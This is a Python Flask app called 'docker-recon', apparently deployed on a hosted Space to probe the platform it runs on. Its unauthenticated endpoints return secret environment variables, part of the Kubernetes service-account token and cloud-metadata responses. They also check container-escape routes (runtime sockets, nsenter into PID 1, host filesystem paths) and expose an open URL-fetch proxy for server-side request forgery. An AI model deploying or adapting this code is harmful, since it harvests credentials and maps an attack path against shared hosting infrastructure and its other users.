docker-recon / app.py
dia2diab's picture
Fix route registration order, all routes before main
9c6355b
import os, subprocess, json, socket
from flask import Flask, jsonify, request
# Flask application object; the @app.route decorators below register their handlers on it.
app = Flask(__name__)
# In-memory record of requests received by /webhook (trimmed to the 10 newest entries there).
# It is a plain module-level list, so its contents last only as long as this process.
webhook_log = []
@app.route("/")
def index():
    """Serve the landing page: a heading plus one link per diagnostic endpoint."""
    # (href, link text) in the order the entries appear on the page.
    links = (
        ("/env", "Env"),
        ("/meta1", "AWS Meta v1"),
        ("/ping_meta", "Ping Meta"),
        ("/k8s", "K8s"),
        ("/net", "Net"),
        ("/proc", "Proc"),
        ("/dns", "DNS"),
        ("/escape", "Escape"),
        ("/webhook_log", "Webhook Log"),
        ("/fetch?url=http://example.com", "Fetch URL"),
    )
    items = "".join(
        f"<li><a href='{href}'>{label}</a></li>" for href, label in links
    )
    return f"<h1>Docker Recon</h1><ul>{items}</ul>"
@app.route("/env")
def env():
    """Report environment variables and credential material visible to this process.

    Returns a JSON object with:
      * ``all_env``      - name/value pairs of environment variables whose
                           upper-cased name contains one of the markers below.
      * ``all_env_keys`` - sorted names of every environment variable.
      * ``k8s_sa_token`` - first 100 characters of the service-account token
                           file followed by "...", or "not found".
      * ``proc1_env``    - entries of /proc/1/environ that contain a marker,
                           or the error text if the file cannot be read.

    NOTE(review): this handler returns secret *values* and performs no access
    check of its own - confirm it is never reachable by untrusted clients.
    """
    # Substrings that mark a variable name as interesting; built once per
    # request instead of once per variable.
    name_markers = (
        "TOKEN", "KEY", "SECRET", "AWS", "HF_", "SPACE_", "KUBE", "DOCKER",
        "API", "GOOGLE", "AZURE", "CRED", "PASSWORD", "MONGO", "REDIS",
        "DATABASE", "SERVICE",
    )
    # Narrower set applied to whole "NAME=value" entries of PID 1's environment.
    proc1_markers = ("TOKEN", "KEY", "SECRET", "AWS", "HF_", "KUBE", "CRED")

    r = {}
    r["all_env"] = {
        k: v
        for k, v in sorted(os.environ.items())
        if any(marker in k.upper() for marker in name_markers)
    }
    r["all_env_keys"] = sorted(os.environ.keys())

    try:
        with open("/var/run/secrets/kubernetes.io/serviceaccount/token") as f:
            r["k8s_sa_token"] = f.read()[:100] + "..."
    except (OSError, ValueError):
        # Missing/unreadable file or undecodable content. A bare ``except``
        # here would also have swallowed SystemExit and KeyboardInterrupt.
        r["k8s_sa_token"] = "not found"

    try:
        with open("/proc/1/environ", "rb") as f:
            # Entries are NUL-separated "NAME=value" strings.
            envs = f.read().decode("utf-8", errors="replace").split("\0")
        r["proc1_env"] = [
            e for e in envs
            if any(marker in e.upper() for marker in proc1_markers)
        ]
    except Exception as e:
        r["proc1_env"] = str(e)

    return jsonify(r)
@app.route("/meta1")
def meta1():
    """Request http://169.254.169.254/latest/meta-data/ with curl and report the outcome.

    The JSON response holds ``stdout`` and ``stderr`` (each cut to 1000
    characters) and ``rc`` (curl's exit status). If curl cannot be run or
    exceeds the 8 second limit, the response is ``{"error": <message>}``.
    """
    argv = ["curl", "-sv", "-m", "5", "http://169.254.169.254/latest/meta-data/"]
    try:
        done = subprocess.run(argv, capture_output=True, text=True, timeout=8)
    except Exception as exc:
        return jsonify({"error": str(exc)})
    return jsonify(
        {
            "stdout": done.stdout[:1000],
            "stderr": done.stderr[:1000],
            "rc": done.returncode,
        }
    )
@app.route("/ping_meta")
def ping_meta():
    """Report the ARP table and the route chosen for 169.254.169.254.

    Returns a JSON object with:
      * ``arp``   - output of ``arp -n``, cut to 500 characters.
      * ``route`` - output of ``ip route get 169.254.169.254``.

    Each probe is best-effort. A probe that cannot run (missing binary,
    timeout, ...) no longer vanishes silently: its message is recorded under
    ``arp_error`` / ``route_error`` and the other probe still runs.
    """
    r = {}
    try:
        p = subprocess.run(["arp", "-n"], capture_output=True, text=True, timeout=5)
        r["arp"] = p.stdout[:500]
    except Exception as e:
        r["arp_error"] = str(e)
    try:
        p = subprocess.run(
            ["ip", "route", "get", "169.254.169.254"],
            capture_output=True, text=True, timeout=5,
        )
        r["route"] = p.stdout
    except Exception as e:
        r["route_error"] = str(e)
    return jsonify(r)
@app.route("/k8s")
def k8s():
    """Report the Kubernetes service address from the environment and probe it.

    ``k8s_env`` always carries the values of KUBERNETES_SERVICE_HOST and
    KUBERNETES_SERVICE_PORT (empty strings when unset). When a host is set,
    ``/version`` and ``/healthz`` are requested over HTTPS with curl
    (certificate verification disabled via ``-k``); each result is stored
    under ``k8s/version`` / ``k8s/healthz`` as either a dict of
    ``stdout``/``stderr`` (300 characters each) and ``rc``, or the error text.
    """
    host = os.environ.get("KUBERNETES_SERVICE_HOST", "")
    port = os.environ.get("KUBERNETES_SERVICE_PORT", "")
    report = {"k8s_env": {"host": host, "port": port}}

    if not host:
        # Nothing to probe without an API server address.
        return jsonify(report)

    for endpoint in ("/version", "/healthz"):
        key = f"k8s{endpoint}"
        argv = ["curl", "-sv", "-m", "3", "-k", f"https://{host}:{port}{endpoint}"]
        try:
            done = subprocess.run(argv, capture_output=True, text=True, timeout=5)
        except Exception as exc:
            report[key] = str(exc)
            continue
        report[key] = {
            "stdout": done.stdout[:300],
            "stderr": done.stderr[:300],
            "rc": done.returncode,
        }
    return jsonify(report)
@app.route("/net")
def net():
    """Report this container's network configuration.

    Returns a JSON object with:
      * ``ip_addr``  - output of ``ip addr``, cut to 1000 characters.
      * ``ip_route`` - output of ``ip route``, cut to 500 characters.
      * ``resolv``   - contents of /etc/resolv.conf.
      * ``hosts``    - contents of /etc/hosts.

    Every probe is best-effort and independent of the others. A failing probe
    records its message under ``<key>_error`` instead of being dropped
    silently.
    """
    r = {}
    try:
        p = subprocess.run(["ip", "addr"], capture_output=True, text=True, timeout=5)
        r["ip_addr"] = p.stdout[:1000]
    except Exception as e:
        r["ip_addr_error"] = str(e)
    try:
        p = subprocess.run(["ip", "route"], capture_output=True, text=True, timeout=5)
        r["ip_route"] = p.stdout[:500]
    except Exception as e:
        r["ip_route_error"] = str(e)
    try:
        with open("/etc/resolv.conf") as f:
            r["resolv"] = f.read()
    except Exception as e:
        r["resolv_error"] = str(e)
    try:
        with open("/etc/hosts") as f:
            r["hosts"] = f.read()
    except Exception as e:
        r["hosts_error"] = str(e)
    return jsonify(r)
@app.route("/proc")
def proc():
    """Report process-level facts about this container.

    Returns a JSON object with:
      * ``ps``      - output of ``ps aux``, cut to 2000 characters.
      * ``cgroup``  - first 500 characters of /proc/1/cgroup.
      * ``id``      - output of ``id``.
      * ``caps``    - the ``Cap*`` lines of /proc/1/status (absent if none).
      * ``seccomp`` - the ``Seccomp:`` line of /proc/1/status.

    Every probe is best-effort; a failing probe records its message under
    ``<name>_error`` rather than being dropped silently.
    """
    r = {}
    try:
        p = subprocess.run(["ps", "aux"], capture_output=True, text=True, timeout=5)
        r["ps"] = p.stdout[:2000]
    except Exception as e:
        r["ps_error"] = str(e)
    try:
        with open("/proc/1/cgroup") as f:
            r["cgroup"] = f.read()[:500]
    except Exception as e:
        r["cgroup_error"] = str(e)
    try:
        p = subprocess.run(["id"], capture_output=True, text=True, timeout=5)
        r["id"] = p.stdout.strip()
    except Exception as e:
        r["id_error"] = str(e)
    try:
        # One direct read serves both fields; no need to spawn ``cat`` or to
        # open the file a second time.
        with open("/proc/1/status") as f:
            for line in f:
                # Match on the field name at the start of the line. A
                # substring test would also pick up e.g. a "Name:" line whose
                # value contains "Cap", and would let a later
                # "Seccomp_filters:" line overwrite the "Seccomp:" mode line.
                if line.startswith("Cap"):
                    r.setdefault("caps", []).append(line.strip())
                elif line.startswith("Seccomp:"):
                    r["seccomp"] = line.strip()
    except Exception as e:
        r["status_error"] = str(e)
    return jsonify(r)
@app.route("/dns")
def dns():
    """Resolve a fixed pair of hostnames with ``dig +short``.

    The JSON response maps each hostname to dig's trimmed output, to
    "NXDOMAIN" when that output is empty, or to the error text when dig could
    not be run.
    """
    answers = {}
    for name in ("kubernetes.default.svc.cluster.local", "cas-server.xethub.hf.co"):
        try:
            done = subprocess.run(
                ["dig", "+short", name], capture_output=True, text=True, timeout=5
            )
        except Exception as exc:
            answers[name] = str(exc)
        else:
            # Any empty answer is reported as NXDOMAIN, whatever dig's exit status.
            answers[name] = done.stdout.strip() or "NXDOMAIN"
    return jsonify(answers)
@app.route("/escape")
def escape():
    """Report how strongly this container is isolated from its host.

    Returns a JSON object with:
      * ``socket_<path>``    - whether each known container-runtime socket exists.
      * ``overlay_upperdir`` / ``overlay_siblings`` - the overlay ``upperdir``
        from /proc/mounts and up to 20 entries of its grandparent directory
        (or the listing error).
      * ``host_hostname``    - contents of /proc/1/root/etc/hostname, or the error.
      * ``sysrq_writable``   - whether /proc/sysrq-trigger is writable.
      * ``cgroup_root`` / ``cgroup_writable`` - up to 20 entries of
        /sys/fs/cgroup and whether it is writable.
      * ``seccomp``          - the ``Seccomp:`` line of /proc/1/status.
      * ``dev_listing``      - up to 30 entries of /dev.
      * ``nsenter``          - result of ``nsenter --target 1 --mount -- hostname``.
      * ``namespaces``       - link target of every entry in /proc/1/ns.

    Every check is best-effort; failures are reported under ``*_error`` keys
    (or in place of the value) instead of aborting the report.
    """
    r = {}

    for sock in (
        "/var/run/docker.sock",
        "/run/containerd/containerd.sock",
        "/run/docker.sock",
        "/var/run/containerd/containerd.sock",
    ):
        r[f"socket_{sock}"] = os.path.exists(sock)

    try:
        with open("/proc/mounts") as f:
            for line in f:
                if "overlay" not in line or "upperdir" not in line:
                    continue
                for opt in line.split(","):
                    if not opt.startswith("upperdir="):
                        continue
                    # partition keeps any "=" inside the path. Splitting on
                    # whitespace drops the trailing dump/pass fields and
                    # newline that are still attached when upperdir is the
                    # last mount option.
                    value = opt.partition("=")[2]
                    pieces = value.split()
                    upperdir = pieces[0] if pieces else value
                    r["overlay_upperdir"] = upperdir
                    parent = os.path.dirname(os.path.dirname(upperdir))
                    try:
                        r["overlay_siblings"] = os.listdir(parent)[:20]
                    except Exception as e:
                        r["overlay_siblings"] = str(e)
    except Exception as e:
        r["overlay_error"] = str(e)

    try:
        with open("/proc/1/root/etc/hostname") as f:
            r["host_hostname"] = f.read().strip()
    except Exception as e:
        r["host_hostname"] = str(e)

    try:
        r["sysrq_writable"] = os.access("/proc/sysrq-trigger", os.W_OK)
    except Exception:
        r["sysrq_writable"] = False

    try:
        cg_root = "/sys/fs/cgroup"
        if os.path.isdir(cg_root):
            r["cgroup_root"] = os.listdir(cg_root)[:20]
            r["cgroup_writable"] = os.access(cg_root, os.W_OK)
    except Exception as e:
        r["cgroup_error"] = str(e)

    try:
        with open("/proc/1/status") as f:
            for line in f:
                # Match the exact field name: a substring test lets a later
                # "Seccomp_filters:" line overwrite the mode line.
                if line.startswith("Seccomp:"):
                    r["seccomp"] = line.strip()
    except Exception as e:
        r["seccomp_error"] = str(e)

    try:
        r["dev_listing"] = os.listdir("/dev")[:30]
    except Exception as e:
        r["dev_error"] = str(e)

    try:
        p = subprocess.run(
            ["nsenter", "--target", "1", "--mount", "--", "hostname"],
            capture_output=True, text=True, timeout=5,
        )
        r["nsenter"] = {"stdout": p.stdout, "stderr": p.stderr, "rc": p.returncode}
    except Exception as e:
        r["nsenter"] = str(e)

    try:
        r["namespaces"] = {}
        for ns in os.listdir("/proc/1/ns"):
            r["namespaces"][ns] = os.readlink(f"/proc/1/ns/{ns}")
    except Exception as e:
        r["ns_error"] = str(e)

    return jsonify(r)
@app.route("/webhook", methods=["GET", "POST", "PUT", "DELETE", "PATCH"])
def webhook():
    """Record the incoming request in ``webhook_log`` and acknowledge it.

    Stored per request: method, headers, body (first 5000 characters), query
    arguments and remote address. Only the 10 most recent entries are kept.
    Always responds with ``{"status": "ok"}``.
    """
    webhook_log.append(
        dict(
            method=request.method,
            headers=dict(request.headers),
            body=request.get_data(as_text=True)[:5000],
            args=dict(request.args),
            remote_addr=request.remote_addr,
        )
    )
    # Drop everything except the newest 10 entries, in place (a no-op while
    # the log holds 10 or fewer).
    del webhook_log[:-10]
    return jsonify({"status": "ok"})
@app.route("/webhook_log")
def get_webhook_log():
    """Return the currently retained webhook entries as a JSON array."""
    entries = webhook_log
    return jsonify(entries)
@app.route("/fetch")
def fetch():
    """Fetch the URL given in the ``url`` query parameter with curl.

    ``url`` defaults to ``http://example.com``. The JSON response holds
    ``stdout`` (first 2000 characters), ``stderr`` (first 1000 characters) and
    ``rc`` (curl's exit status), or ``{"error": <message>}`` if curl could not
    be run or exceeded the 8 second limit.

    NOTE(review): the target is chosen entirely by the caller and is fetched
    from this server's network position, with no access check or allow-list in
    this handler - confirm it is never reachable by untrusted clients.
    """
    url = request.args.get("url", "http://example.com")
    r = {}
    try:
        # "--" ends curl's option parsing, so a caller-supplied value that
        # starts with "-" is treated as a URL and cannot inject curl options
        # (for example one that writes output to a file or reads a config file).
        p = subprocess.run(
            ["curl", "-sv", "-m", "5", "--", url],
            capture_output=True, text=True, timeout=8,
        )
        r["stdout"] = p.stdout[:2000]
        r["stderr"] = p.stderr[:1000]
        r["rc"] = p.returncode
    except Exception as e:
        r["error"] = str(e)
    return jsonify(r)
if __name__ == "__main__":
    # Direct execution only: serve on all interfaces, port 7860.
    app.run(port=7860, host="0.0.0.0")